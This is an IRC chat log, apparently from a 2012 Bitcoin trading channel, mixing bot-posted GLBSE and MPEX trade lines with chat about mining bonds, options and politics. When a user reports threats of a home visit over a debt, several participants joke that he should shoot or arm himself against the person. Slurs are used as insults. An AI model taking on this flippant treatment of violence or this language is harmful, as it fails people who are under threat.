= 0.288 BTC [+] Sep 10 21:09:50 [GLBSE] [PUREMINING] 1 @ 0.096 BTC [+] Sep 10 21:10:35 [GLBSE] [FPGAMINING] 1 @ 0.76 BTC [-] Sep 10 21:12:39 hokay, so i gots this forex in bitcoins workin nao, opening of accounts starts in a few hours i guess Sep 10 21:15:26 kakobrekla: can i see it too :) Sep 10 21:15:56 usagi: where do you post CPA financial reports and how often do you do so? Sep 10 21:16:06 EskimoBob: sorry :( Sep 10 21:16:37 well thing this is still so fresh i just bought a domain yesterday havent put up a site yet (im really busy and sick at the same time) Sep 10 21:16:41 but here is a faq draft Sep 10 21:16:42 http://pastebin.com/QVVm2a5Q Sep 10 21:18:06 usually the biggest names in bitcoin finance are the bad ones Sep 10 21:18:30 [GLBSE] [OBSI.HRPT] 2 @ 0.10159994 = 0.2032 BTC [+] Sep 10 21:19:07 not much left..... Sep 10 21:19:26 usagi: i'm not looking for a list of your investments, i was looking for cash flow, balance sheet, and income statements Sep 10 21:19:50 in consideration of investment Sep 10 21:20:16 isn't cpa publically traded? Sep 10 21:20:44 cash flow, balance sheet, and income statements shouldn't be private, and wouldn't harm you to release them Sep 10 21:21:02 indeed Sep 10 21:21:25 copumpkin: depends on what state you ask that in Sep 10 21:22:01 copumpkin: i'm not a licensed accountant, i am still considered a student as i am working towards a cpa Sep 10 21:22:13 [GLBSE] [GIGAMINING] 2 @ 0.5 = 1 BTC [+] Sep 10 21:22:30 heh, i actually love 'em Sep 10 21:23:37 here's something i just saw: Sep 10 21:23:38 http://rt.com/usa/news/flynt-romney-records-tax-802/ Sep 10 21:24:52 :P Sep 10 21:26:15 [GLBSE] [OBSI.HRPT] 5 @ 0.10159994 = 0.508 BTC [+] Sep 10 21:28:04 [GLBSE] [GIGAMINING] 2 @ 0.49998 = 1 BTC [-] Sep 10 21:28:35 [GLBSE] [GIGAMINING] 2 @ 0.49999 = 1 BTC [+] Sep 10 21:28:53 [GLBSE] [GIGAMINING] 4 @ 0.5 = 2 BTC [+] Sep 10 21:36:18 [GLBSE] [GIGAMINING] 64 @ 0.5 = 32 BTC [+] Sep 10 21:37:05 usagi Sep 10 21:37:15 Am getting an office in the city Sep 10 21:37:32 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 10 21:38:47 You belong to the city Sep 10 21:38:51 You belong to the night Sep 10 21:38:57 eh Sep 10 21:39:04 I meant London city... Sep 10 21:39:06 i.e. Sep 10 21:39:10 the square mile Sep 10 21:39:23 http://www.youtube.com/watch?v=j4ueaD22hg8 Sep 10 21:40:08 from Miami Vice? Sep 10 21:40:09 lol Sep 10 21:40:54 so Sep 10 21:40:56 cheezy Sep 10 21:41:44 [GLBSE] [ASICMINER] 4 @ 0.1011 = 0.4044 BTC [-] Sep 10 21:46:27 [MPEX] [S.MPOE] 200 @ 0.00039727 = 0.0795 BTC [+] Sep 10 21:46:29 [MPEX] [S.MPOE] 11482 @ 0.00039798 = 4.5696 BTC [+] Sep 10 21:46:29 [MPEX] [S.MPOE] 3500 @ 0.000399 = 1.3965 BTC [+] Sep 10 21:46:30 [MPEX] [S.MPOE] 3700 @ 0.00039911 = 1.4767 BTC [+] Sep 10 21:46:31 [MPEX] [S.MPOE] 20200 @ 0.00039918 = 8.0634 BTC [+] Sep 10 21:46:33 [MPEX] [S.MPOE] 13818 @ 0.00040026 = 5.5308 BTC [+] Sep 10 21:52:44 umm Sep 10 21:52:50 anyone runing bitcoin qt on latest ubuntu Sep 10 21:53:37 hm Sep 10 21:53:41 how do i open settings Sep 10 21:53:46 http://shrani.si/f/3L/AU/3pn4rV5i/wtf.png Sep 10 21:53:50 note the difference Sep 10 21:55:07 ja Sep 10 21:55:07 eh Sep 10 21:55:07 12.04 Sep 10 21:55:07 is that the latest or are you talking about the beta? Sep 10 21:55:08 am using 12.04 Sep 10 21:55:08 having no issues Sep 10 21:55:38 12.04 Sep 10 21:55:47 umm Sep 10 21:56:00 do you see 'file', 'settings', 'help' ? Sep 10 21:57:28 ok nevermind Sep 10 21:57:31 i found it Sep 10 21:57:34 on the top of the screen Sep 10 21:57:37 fuckin retarded Sep 10 21:59:07 lol Sep 10 21:59:16 you're using regular ubuntu right? Sep 10 21:59:25 I think they're trying to go down the OSX route Sep 10 21:59:30 for file diologes etc. Sep 10 21:59:38 I'm using kubuntu Sep 10 21:59:43 KDE fan Sep 10 22:01:02 yeah this is unity or something Sep 10 22:01:42 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 10 22:02:09 i use cli 99.5% of the time Sep 10 22:02:16 so then im all lost in these guis Sep 10 22:02:29 well Sep 10 22:02:35 I do use firefox quite a lot Sep 10 22:02:42 but Sep 10 22:02:50 everything else is usually terminals and emacs Sep 10 22:04:10 I am looking forward to Saturday :D Sep 10 22:04:16 [GLBSE] [PUREMINING] 1 @ 0.096 BTC [+] Sep 10 22:05:31 [MPEX] [S.DICE] 13000 @ 0.00335 = 43.55 BTC [-] Sep 10 22:06:01 https://bitcointalk.org/index.php?topic=108431.new#new Sep 10 22:06:08 what is this info of which I do not know xD or is it a troll? Sep 10 22:06:36 ;;ticker Sep 10 22:06:37 Best bid: 11.0283, Best ask: 11.115, Bid-ask spread: 0.08670, Last trade: 11.115, 24 hour volume: 36425, 24 hour low: 10.8745, 24 hour high: 11.127 Sep 10 22:06:50 the name is Atlas Sep 10 22:06:55 of course it's a troll Sep 10 22:07:46 [MPEX] [F.GIGA.ETF] 12500 @ 0.00045103 = 5.6379 BTC [+] Sep 10 22:07:47 [MPEX] [F.GIGA.ETF] 36200 @ 0.00047458 = 17.1798 BTC [+] Sep 10 22:08:43 hahah true xD Sep 10 22:08:49 didn't see the name :P Sep 10 22:08:53 How are you Nefario? Sep 10 22:09:03 I'm good Sep 10 22:09:10 up to my eyeballs with work Sep 10 22:09:13 which is good Sep 10 22:09:37 That is no troll Sep 10 22:09:42 I got the information from here Sep 10 22:09:48 I will remove it if its false Sep 10 22:10:13 Anyways, I had to give Theymos another Benjamin in Bitcoins for that account. Sep 10 22:10:46 is atlas' picture avatar a picture of Max Stirner? Sep 10 22:11:27 Okay haha as always then :P Sep 10 22:12:09 [GLBSE] [FPGAMINING] 5 @ 0.75 = 3.75 BTC [-] Sep 10 22:12:12 Lyspoon: Yes. Sep 10 22:12:20 Lyspooner* Sep 10 22:12:33 that's cool Sep 10 22:12:48 The man pretty much spells reality. Sep 10 22:12:56 and that's why most people can't handle his works. Sep 10 22:13:11 That's why it made Marx shit himself. Sep 10 22:13:15 he made* Sep 10 22:13:45 [GLBSE] [FPGAMINING] 1 @ 0.75 BTC [-] Sep 10 22:14:55 A bit pissed at the community atm :8 got a angry email yesterday saying he/she would start calling my family, and if I didn't pay him/her, the he/she would drive to my home and force me to pay... The scare thing is he/she knows my addressa nd real name :( Sep 10 22:15:23 And I am not even the one that owes the money, it's INAU as GIPPT is insured by him. Sep 10 22:15:23 get a sword Sep 10 22:15:33 Are you in America? Sep 10 22:16:03 I ask because some states have castle doctrine laws Sep 10 22:16:05 DeaDTerra: so shoot him/her Sep 10 22:16:09 nah I think it's just a troll but still, I feel kind of hurt. I put trust into the community when I released my ID. It was under a silent agreement that it would not be misused. Sep 10 22:16:09 ^^^ Sep 10 22:16:12 Hahah nope Sweden xD Sep 10 22:16:17 DeaDTerra: fuck dude Sep 10 22:16:27 some asshole threatened to kill me because diablominer wouldnt work on his box Sep 10 22:16:29 I don't get to do anything to someone if they come to my house xD Sep 10 22:16:34 I wonder if the cops ever found his body Sep 10 22:16:39 don't get mad at the community, get mad at the dude who said he was going to force you to pay Sep 10 22:16:57 er Sep 10 22:16:58 The community is also very immature Sep 10 22:16:59 force you to pay what? Sep 10 22:17:03 did gamma go bankrupt? Sep 10 22:17:05 Being mad it is like being mad at an infant Sep 10 22:17:10 at it* Sep 10 22:17:11 Yea I am, I am not mad at the community more disapointed. But I am mad at that person, once I find out who it is, I will make sure to actively oppose that person. Sep 10 22:17:15 Bane_Capital: why would anyone be mad at food? Sep 10 22:17:21 L O L Sep 10 22:17:22 Not GBF is going fine, it can't go bankrupt. Sep 10 22:17:38 im pretty pissed at "the community". Sep 10 22:17:53 mostly for lacking any discernment whatsoever. but hey, as bane says... what are you gonna do. Sep 10 22:17:59 GIPPT has payed about 50% of the repayment from the insured pirate pass through but due to the liquidity issues with IMSAguy and HK that help the backing, it's going slow. Hence people are being pissed at me even though I am not the insurer or the backer. Sep 10 22:18:15 well... you're the owner. Sep 10 22:18:21 so why are you even associated at it? Sep 10 22:18:34 I wrote a very well written email explaining how I felt about this whole thing hopefully the person will rethink Sep 10 22:18:45 I acted as a middle man and I insured 5% which I have paid back. Sep 10 22:19:35 I specifically stated before the IPO that I am not resposible for the rest 95% and it also says so in the contract. Oh well I guess as I am the head figure people throw the shit at me instead, I guess I should expect it but still :( Sep 10 22:22:34 DeaDTerra: so... you..... Sep 10 22:22:43 took all the risk and got none of the profit? Sep 10 22:22:48 [GLBSE] [GIGAMINING] 3 @ 0.548269 = 1.6448 BTC [+] Sep 10 22:22:49 [MPEX] [S.MPOE] 15600 @ 0.00039704 = 6.1938 BTC [-] Sep 10 22:23:37 [GLBSE] [GIGAMINING] 9 @ 0.51 = 4.59 BTC [-] Sep 10 22:23:41 Diablo-D3: Some people are charitable. Sep 10 22:23:45 What else can be said? Sep 10 22:24:01 not in money you arent Sep 10 22:24:03 No, I wrote a contract which clearly stated I acted as a middle man and were not responsable for the other 95%, I clearly stated that if all the other insureres/backers default then I am not responsible for the debt. And then I took 0.5% of the profit in admin fee :) Sep 10 22:24:21 DeaDTerra: contracts mean shit when everyone wants their money Sep 10 22:24:30 Now that people chose to ignore that and threaten me instead, when I don't even have the money they want. Is just a side effect that I didn't plan Sep 10 22:24:43 [MPEX] [F.GIGA.ETF] 35300 @ 0.00047364 = 16.7195 BTC [-] Sep 10 22:24:49 Yea I have realized that after the whole pirate thing. People have turned into beasts... Sep 10 22:25:00 people haven't turned into any beasts. Sep 10 22:25:11 mircea_popescu: no? Sep 10 22:25:14 no. Sep 10 22:25:20 you sure? Sep 10 22:25:24 a bunch of people were playing a mmorpg where they were financiers Sep 10 22:25:29 this is blowing up all around them. Sep 10 22:25:37 ha ha Sep 10 22:25:39 pretty much the whole story. Sep 10 22:25:45 as usual, dmc remains the only worthwhile investment Sep 10 22:25:51 lol Sep 10 22:26:03 DOXEDed Sep 10 22:26:03 [GLBSE] [KRAKEN] 5 @ 0.00999999 = 0.05 BTC [-] Sep 10 22:26:10 !pl dmc 1 Sep 10 22:26:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 22:26:18 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.035 BTC. Capital gain: -0.965 BTC. Total: -0.93864186 BTC. (-93.9%) Sep 10 22:26:26 [GLBSE] [BTC-MINING] 1 @ 0.98 BTC [-] Sep 10 22:26:36 seems one of the worst fake investments on global scam exchange imo. Sep 10 22:26:58 mircea_popescu: no one is going to take you seriously if you keep saying global scam exchange Sep 10 22:27:03 I think they have, they go for the throat on many lenders before they think. When people even attack Patrick you know somethings wrong... Sep 10 22:27:18 It will pass in good time. Sep 10 22:27:30 This is only expected with an irreversible currency Sep 10 22:27:38 Diablo-D3 nobody *that wants to continue playing a finance-themed mmorpg*. fify. Sep 10 22:28:14 @mp can you explain how you approach options settlement? If I sell the $10 put and USD/BTC settles at $5 then I owe $5 which is 1 BTC. Is that correct? And then margining can be done by testing the amount of BTC needed to cover an x% move? Sep 10 22:28:16 Well, I just think the rage is missplaced and is boiling over on innocent people Sep 10 22:28:30 usagi: btw, I think Im going to use my contract Sep 10 22:28:35 guilty by association, it's called Sep 10 22:28:36 usagi: Im going to borrow against future earnings for a year. Sep 10 22:28:39 kinda how the wild west worked. Sep 10 22:28:42 usagi: and also reverse the motion Sep 10 22:28:53 usagi: so thats also included in borrowed funds Sep 10 22:29:14 freefal2 are you buying or selling short that option ? Sep 10 22:29:15 usagi: read the contract, I can borrow against dividends unlimitedly. Sep 10 22:29:43 selling (writing) the option Sep 10 22:30:00 usagi: the motion just doesnt work over long periods of time Sep 10 22:30:08 if it's a call you will have to deposit 1 btc per contract. if it's a put you will have to deposit an appropiate sum based on the strike. Sep 10 22:30:12 so Ill just include last month under the normal contract and just continue it Sep 10 22:30:21 once the option is exercised you get back w/e wasn't owed to the buyer. Sep 10 22:30:35 w/e means weekend Sep 10 22:31:07 w/e means whatever Sep 10 22:31:21 that seems more right Sep 10 22:31:44 freefal2 :p Sep 10 22:31:55 usagi: and Ill quit borrowing against future dividends Sep 10 22:31:56 you could use wtf for whatever Sep 10 22:31:59 once nav hits 1 Sep 10 22:32:02 [GLBSE] [BDT] 2 @ 1 = 2 BTC [-] Sep 10 22:32:10 wtf is what the fuck normally. Sep 10 22:32:12 usagi: its what I should have done to begin with Sep 10 22:32:20 well sure, but it works in that sentence of yours Sep 10 22:32:24 usagi: go ahead. Sep 10 22:32:34 "once the option is exercised you get back wtf wasn't owed to the buyer" Sep 10 22:32:35 but I cant see how you can afford it Sep 10 22:32:39 lol Sep 10 22:32:44 usagi: plus, how are you going to compete? Sep 10 22:32:59 no, I mean, you dont know anyone in the industry Sep 10 22:33:03 so how are you going to do it? Sep 10 22:33:05 magical pocky usagi lol Sep 10 22:33:17 I have eyes in the back of my head. Sep 10 22:34:18 got it. thanks for the explanation. Sep 10 22:37:00 [GLBSE] [GSDPT] 75 @ 0.00339 = 0.2543 BTC [+] Sep 10 22:37:03 [GLBSE] [BITCOINRS] 20 @ 0.052 = 1.04 BTC [+] Sep 10 22:37:11 Pocky = Weaboo Litmus Test Sep 10 22:37:18 [GLBSE] [CPA] 5 @ 0.031 = 0.155 BTC [+] Sep 10 22:37:34 [GLBSE] [BITCOINRS] 1 @ 0.052 BTC [+] Sep 10 22:37:39 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 10 22:37:42 pocky doesnt even exist Sep 10 22:37:50 I don't even. Sep 10 22:38:01 nor do tiny little gundam model kits on the top of rocket noodles. Sep 10 22:38:26 That sounds gay. Sep 10 22:38:29 "Men's pocky" Sep 10 22:38:46 usagi: That's why I guessed Sep 10 22:38:49 what* Sep 10 22:38:59 pocky IN japan? Sep 10 22:39:03 that sounds unlikely Sep 10 22:39:08 Weaboos always offered me that crap in high school Sep 10 22:39:17 pocky is the shit they give to foreigners Sep 10 22:39:26 Bane_Capital: jesus, how young are you? Sep 10 22:39:37 Diablo-D3: 18 Sep 10 22:39:47 jesus fuck, why am I always the oldest person here Sep 10 22:39:59 copumpkin: how old? Sep 10 22:40:11 copumpkin: whens your birthdate? Sep 10 22:40:15 I was the youngest person on Bitcointalk in 2009 Sep 10 22:40:27 Im older. Sep 10 22:40:27 It was a better place then Sep 10 22:40:39 You guys would like 2009-2010 Bitcointalk Sep 10 22:40:53 Bane_Capital: I was in bitcoin before the forum was around Sep 10 22:40:58 I was one of the first few dozen users Sep 10 22:41:02 I mined with a cpu _profitably_. Sep 10 22:41:04 Impressive Sep 10 22:41:07 Yea, me too Sep 10 22:41:16 Bane_Capital: also, Im a bitcointalk mod ;) Sep 10 22:41:32 Diablo-D3: I was mod for 3 days. Then something pissed me off Sep 10 22:41:36 and I resigned. Sep 10 22:41:51 heh, I just delete people's posts for fun and profit Sep 10 22:41:53 Like some Ayn Rand hero or something Sep 10 22:42:21 Diablo-D3: At least you aren't like Blitzboom and move crap you don't like to off-topic blatantly Sep 10 22:42:37 "BITCOIN IS GOING UP" Sep 10 22:42:44 "This topic has been moved to off-topic" Sep 10 22:42:54 [GLBSE] [PIMP] 14 @ 0.136 = 1.904 BTC [+] Sep 10 22:43:01 "Hey, guys I love cats. Also, Bitcoin is going down." Sep 10 22:43:05 "Mitt Romney and Paul Ryan" is an anagram for "My Ultimate Ayn Rand Porn" Sep 10 22:43:06 *nothing happens* Sep 10 22:43:11 No Sep 10 22:43:19 Ayn Rand would hate Paul Ryan and Romney Sep 10 22:43:27 atlas shrugged all over my face Sep 10 22:43:42 God, that woman must be rolling in her grave at mach 3 Sep 10 22:44:00 copumpkin: The Fountainhead had a rape scene Sep 10 22:44:27 Roarke cracked eh forget her names marble tile Sep 10 22:44:35 Comes back Sep 10 22:44:41 and just has his way Sep 10 22:44:51 nevermind Sep 10 22:44:53 read the book Sep 10 22:45:22 copumpkin: "fountainhead" is already dirty Sep 10 22:45:27 dude Sep 10 22:45:36 ayn rand would hate the tea party Sep 10 22:45:37 she'd be like Sep 10 22:45:46 WHAT THE FUCK IS WRONG WITH YOU PEOPLE Sep 10 22:45:49 WELFARE IS BAD Sep 10 22:45:49 RELIGIOUS RETARDS Sep 10 22:45:53 GET A JOB Sep 10 22:46:00 GET A LIFE Sep 10 22:46:02 GET LAID Sep 10 22:46:06 OH CHRIST WHAT IS THAT STINK Sep 10 22:46:12 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 10 22:46:17 Ayn Rand spit all over Ronald Reagan Sep 10 22:46:21 WHY DO YOU ALL HAVE ELECTRONIC HANDHELD DEVICES Sep 10 22:46:25 WE LOVE YOU AYN RAND WE READ ALL OF YOUR BOOKS Sep 10 22:46:31 FUCK YOU PEOPLE, I WROTE THAT FOR MONEY Sep 10 22:46:33 wait Sep 10 22:46:35 lol Sep 10 22:46:43 IS THIS A RELIGIOUS MOVEMENT? Sep 10 22:46:51 YES! YOU ARE OUR GODDESS! Sep 10 22:46:57 She hated everyone out of her uncompromising value system. Sep 10 22:46:57 dudes, stfu for a moment, assbot would like to talk and can't get a word in edgewise. Sep 10 22:47:01 FUCK YOU PEOPLE! FUCK ALL OF YOU! SOMEONE GET ME A GODDAMNED COFFEE ALREADY Sep 10 22:47:11 Sep 10 22:47:25 I'll admit I fell in love with Ayn Rand when I was 12. Luckily that died off. Sep 10 22:47:31 *badumtish* Sep 10 22:47:42 lol Sep 10 22:47:46 Bane_Capital: I was lucky enough to have NEVER READ HER SHIT Sep 10 22:47:47 EVER Sep 10 22:47:53 I wont even touch a printed copy Sep 10 22:48:04 [GLBSE] [BTC-BOND] 50 @ 0.00999999 = 0.5 BTC [+] Sep 10 22:48:09 its disgusting filth Sep 10 22:48:24 Nope. Try a Dark Knight villain mixed with a crony corporation. Sep 10 22:48:39 Ran by Mitt Romney. Sep 10 22:49:05 dude Sep 10 22:49:09 mitt romney is a corporation Sep 10 22:49:31 seriously, when he said corporations are people too, he wasnt kidding, hes one of them Sep 10 22:49:37 lol Sep 10 22:49:47 People have tried filing their Driver's Licenses with LLCs Sep 10 22:50:26 The Sovereign Citizen movement has produced so many lulz in regards to that Sep 10 22:52:06 [GLBSE] [CPA] 30 @ 0.031 = 0.93 BTC [+] Sep 10 22:52:13 !ticker btc-mining Sep 10 22:52:15 !ticker btcmc Sep 10 22:52:18 !ticker obsi.abmo Sep 10 22:52:37 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.98] [Spread: 0.08] [Last: 0.98] [24hVol: 14.9366] [7dAvg: 0.99573] Sep 10 22:52:38 [GLBSE:BTCMC] [Bid: 0.55] [Ask: 0.58999] [Spread: 0.03999] [Last: 0.5898] [24hVol: ] [7dAvg: 0.55217142] Sep 10 22:52:40 [GLBSE:OBSI.ABMO] [Bid: 0.00010001] [Ask: 0.1] [Spread: 0.09989999] [Last: 0.1] [24hVol: 0.7] [7dAvg: 0.0905] Sep 10 22:53:39 !ticker FDBF Sep 10 22:53:41 [GLBSE:FDBF] [Bid: 0.13] [Ask: 0.15] [Spread: 0.02] [Last: 0.15] [24hVol: 16.05] [7dAvg: 0.14998666] Sep 10 22:53:43 I have given Theymos over 20BTC in donation fees yet I feel no buyers remorse Sep 10 22:54:35 [MPEX] [S.MPOE] 10407 @ 0.00040026 = 4.1655 BTC [+] Sep 10 22:54:37 [MPEX] [S.MPOE] 13876 @ 0.00040073 = 5.5605 BTC [+] Sep 10 22:54:38 [MPEX] [S.MPOE] 18000 @ 0.00040087 = 7.2157 BTC [+] Sep 10 22:54:38 [MPEX] [S.MPOE] 25600 @ 0.00040102 = 10.2661 BTC [+] Sep 10 22:54:39 [MPEX] [S.MPOE] 9900 @ 0.00040166 = 3.9764 BTC [+] Sep 10 22:54:41 [MPEX] [S.MPOE] 61124 @ 0.0004017 = 24.5535 BTC [+] Sep 10 22:54:42 [MPEX] [S.MPOE] 50900 @ 0.00040171 = 20.447 BTC [+] Sep 10 22:54:43 [MPEX] [S.MPOE] 4858 @ 0.00040182 = 1.952 BTC [+] Sep 10 22:54:44 [MPEX] [S.MPOE] 13700 @ 0.00040214 = 5.5093 BTC [+] Sep 10 22:54:45 [MPEX] [S.MPOE] 45700 @ 0.0004023 = 18.3851 BTC [+] Sep 10 22:54:46 [MPEX] [S.MPOE] 56387 @ 0.0004026 = 22.7014 BTC [+] Sep 10 22:54:47 [MPEX] [S.MPOE] 19100 @ 0.00040293 = 7.696 BTC [+] Sep 10 22:54:47 [MPEX] [S.MPOE] 22580 @ 0.00040367 = 9.1149 BTC [+] Sep 10 22:54:48 [MPEX] [S.MPOE] 26046 @ 0.00040403 = 10.5234 BTC [+] Sep 10 22:54:50 [MPEX] [S.MPOE] 9946 @ 0.00040441 = 4.0223 BTC [+] Sep 10 22:54:51 [MPEX] [S.MPOE] 100 @ 0.00040499 = 0.0405 BTC [+] Sep 10 22:54:52 [MPEX] [S.MPOE] 21400 @ 0.00040542 = 8.676 BTC [+] Sep 10 22:54:53 [MPEX] [S.MPOE] 37478 @ 0.00040569 = 15.2044 BTC [+] Sep 10 22:54:54 [MPEX] [S.MPOE] 23800 @ 0.00040605 = 9.664 BTC [+] Sep 10 22:54:55 [MPEX] [S.MPOE] 11800 @ 0.00040628 = 4.7941 BTC [+] Sep 10 22:54:56 [MPEX] [S.MPOE] 29800 @ 0.00040807 = 12.1605 BTC [+] Sep 10 22:54:57 [MPEX] [S.MPOE] 36819 @ 0.00040867 = 15.0468 BTC [+] Sep 10 22:54:57 [MPEX] [S.MPOE] 6669 @ 0.000409 = 2.7276 BTC [+] Sep 10 22:54:58 [MPEX] [S.MPOE] 24200 @ 0.0004096 = 9.9123 BTC [+] Sep 10 22:54:59 [MPEX] [S.MPOE] 40600 @ 0.00041023 = 16.6553 BTC [+] Sep 10 22:55:00 [MPEX] [S.MPOE] 26800 @ 0.00041309 = 11.0708 BTC [+] Sep 10 22:55:01 [MPEX] [S.MPOE] 637410 @ 0.00042 = 267.7122 BTC [+] Sep 10 22:55:41 Whoa Sep 10 22:56:01 that's totally mircea_popescu buying all that Sep 10 22:57:17 nah, that's my sell bid at 42. Sep 10 22:57:21 somebody likes mpoe Sep 10 22:58:47 http://imgur.com/a/St4oY#0 Sep 10 22:59:02 Poor man. Sep 10 22:59:28 why would someone do that? Sep 10 23:00:21 is that the result of workplace sex ? Sep 10 23:00:29 DeaDTerra: His wife got butthurt Sep 10 23:00:35 I'm sure it's ED related Sep 10 23:05:35 He outdoes GLBSE profit I'm sure. Sep 10 23:14:21 [GLBSE] [TYGRR.BOND-P] 44 @ 0.0330001 = 1.452 BTC [-] Sep 10 23:19:35 [GLBSE] [FPGAMINING] 1 @ 0.78 BTC [+] Sep 10 23:20:34 [GLBSE] [PUREMINING] 2 @ 0.096 = 0.192 BTC [+] Sep 10 23:20:36 [GLBSE] [DMC] 6 @ 0.059999 = 0.36 BTC [+] Sep 10 23:20:38 [GLBSE] [DMC] 1 @ 0.059999 BTC [+] Sep 10 23:20:39 [GLBSE] [DMC] 10 @ 0.06 = 0.6 BTC [+] Sep 10 23:20:40 [GLBSE] [DMC] 100 @ 0.06 = 6 BTC [+] Sep 10 23:20:44 [GLBSE] [GIPPT] 5 @ 0.45 = 2.25 BTC [-] Sep 10 23:24:14 [GLBSE] [TYGRR.BOND-P] 26 @ 0.033 = 0.858 BTC [-] Sep 10 23:25:47 !pl gippt Sep 10 23:25:48 !pl [@] [] Sep 10 23:25:59 !pl gippt 2012-01-01 Sep 10 23:26:01 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 23:26:01 Invalid price supplied. Sep 10 23:26:11 [GLBSE] [TYGRR.BOND-P] 66 @ 0.03 = 1.98 BTC [-] Sep 10 23:26:12 !pl gippt 1 2012-01-01 Sep 10 23:26:12 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 10 23:26:31 GIPPT [1@1BTC] (since: 2012-01-01) paid: 0.50601 BTC. Last price: 0.45 BTC. Capital gain: -0.55 BTC. Total: -0.04399 BTC. (-4.4%) Sep 10 23:34:06 [GLBSE] [BDK.BND] 11 @ 0.1 = 1.1 BTC [-] Sep 10 23:37:03 So.... what is the upgrade path for F.GIGA.ETF? Sep 10 23:37:25 upgrade path ? Sep 10 23:37:32 you mean to tera? Sep 10 23:37:33 probably isnt one Sep 10 23:37:48 yes to tera Sep 10 23:38:05 Bugpowder explain what you mean. Sep 10 23:38:32 when tera comes out, 2 upgrade paths Sep 10 23:38:41 1:1 exchange for terabonds (25GH/s) Sep 10 23:38:56 Bugpowder: its probably going to just go the 1:1 exchange Sep 10 23:38:59 1:4 exchane for terabonds with a .30-.40BTC fee Sep 10 23:39:08 I assume free exchange route Sep 10 23:39:27 f.giga.etf is worth exactly the same thing gigamining is worth. Sep 10 23:40:12 [GLBSE] [V.HRL] 1 @ 0.999 BTC [-] Sep 10 23:40:21 f.giga.etf is actually worth 65000, its just undervalued today. match my ask pls. :) Sep 10 23:41:46 !ticker gigamining' Sep 10 23:41:51 Invalid ticker. Sep 10 23:41:53 !ticker gigamining Sep 10 23:41:56 [GLBSE:GIGAMINING] [Bid: 0.51002] [Ask: 0.54899999] [Spread: 0.03897999] [Last: 0.51] [24hVol: 685.15235164] [7dAvg: 0.70231004] Sep 10 23:41:58 [GLBSE] [PPT.DIV] 10 @ 0.01 = 0.1 BTC [-] Sep 10 23:42:05 !ticker f.giga.etf Sep 10 23:42:07 [MPEX:F.GIGA.ETF] 1day: 0.00038 / 0.00056001 / 0.00064877 (532464 shares, 298.19 BTC), 30day: 0.00038 / 0.00088195 / 0.00115139 (11524772 shares, 10,164.30 BTC) Sep 10 23:42:15 seems about the same story. Sep 10 23:42:59 so.. 1:1 tradein is planned? Sep 10 23:43:12 [GLBSE] [NYAN.B] 10 @ 0.987 = 9.87 BTC [-] Sep 10 23:43:26 what's that mean ? Sep 10 23:44:02 https://bitcointalk.org/index.php?topic=92090.0 Sep 10 23:44:39 free upgrade to 25GH/s from 5GH/s Sep 10 23:45:47 err.... MH/s Sep 10 23:46:18 yeah, i guess so. whatever happens to gigamining bonds. Sep 10 23:52:32 [MPEX] [F.GIGA.ETF] 18400 @ 0.00050429 = 9.2789 BTC [+] Sep 10 23:54:18 havent you been listening to EskimoBob, mircea_popescu Sep 10 23:54:28 he's been on my ignore for a while. Sep 10 23:55:19 [GLBSE] [JLP-BMD] 2 @ 0.0499 = 0.0998 BTC [-] Sep 11 00:00:30 [GLBSE] [GMVT-BOT] 7 @ 0.11 = 0.77 BTC [-] Sep 11 00:00:32 [GLBSE] [GMVT-BOT] 1 @ 0.1001001 BTC [-] Sep 11 00:00:32 [GLBSE] [GMVT-BOT] 400 @ 0.1001 = 40.04 BTC [-] Sep 11 00:00:33 [GLBSE] [GMVT-BOT] 43 @ 0.100012 = 4.3005 BTC [-] Sep 11 00:00:35 [GLBSE] [GMVT-BOT] 20 @ 0.100011 = 2.0002 BTC [-] Sep 11 00:00:36 [GLBSE] [GMVT-BOT] 50 @ 0.10001001 = 5.0005 BTC [-] Sep 11 00:00:37 [GLBSE] [GMVT-BOT] 40 @ 0.10001 = 4.0004 BTC [-] Sep 11 00:00:38 [GLBSE] [GMVT-BOT] 65 @ 0.10000102 = 6.5001 BTC [-] Sep 11 00:00:39 [GLBSE] [GMVT-BOT] 25 @ 0.10000101 = 2.5 BTC [-] Sep 11 00:00:40 [GLBSE] [GMVT-BOT] 10 @ 0.10000101 = 1 BTC [-] Sep 11 00:00:41 [GLBSE] [GMVT-BOT] 39 @ 0.100001 = 3.9 BTC [-] Sep 11 00:03:00 [GLBSE] [GIGAMINING] 10 @ 0.54899999 = 5.49 BTC [+] Sep 11 00:03:02 [GLBSE] [GIGAMINING] 83 @ 0.549 = 45.567 BTC [+] Sep 11 00:08:22 [GLBSE] [GIGAMINING] 150 @ 0.55 = 82.5 BTC [+] Sep 11 00:08:23 [GLBSE] [GIGAMINING] 8 @ 0.599 = 4.792 BTC [+] Sep 11 00:08:25 [GLBSE] [GIGAMINING] 10 @ 0.6 = 6 BTC [+] Sep 11 00:08:26 [GLBSE] [GIGAMINING] 100 @ 0.6399 = 63.99 BTC [+] Sep 11 00:08:46 YESSS Sep 11 00:09:08 Bot those 100 for 0.50 two hours ago Sep 11 00:09:44 so pissed my coins didnt get there in time to pick up the 0.45 and 0.47 ones Sep 11 00:09:48 [GLBSE] [JLP-BMD] 4 @ 0.0499 = 0.1996 BTC [-] Sep 11 00:09:57 [GLBSE] [JLP-BMD] 6 @ 0.05 = 0.3 BTC [+] Sep 11 00:10:05 [GLBSE] [ASICMINER] 1 @ 0.1015 BTC [+] Sep 11 00:10:07 [GLBSE] [GIGAMINING] 70 @ 0.64 = 44.8 BTC [+] Sep 11 00:10:08 [GLBSE] [GIGAMINING] 9 @ 0.654 = 5.886 BTC [+] Sep 11 00:10:09 [GLBSE] [GIGAMINING] 500 @ 0.655 = 327.5 BTC [+] Sep 11 00:10:57 [MPEX] [F.GIGA.ETF] 10500 @ 0.00052942 = 5.5589 BTC [+] Sep 11 00:10:58 [MPEX] [F.GIGA.ETF] 21000 @ 0.00055726 = 11.7025 BTC [+] Sep 11 00:10:59 [MPEX] [F.GIGA.ETF] 48700 @ 0.00063333 = 30.8432 BTC [+] Sep 11 00:11:00 [MPEX] 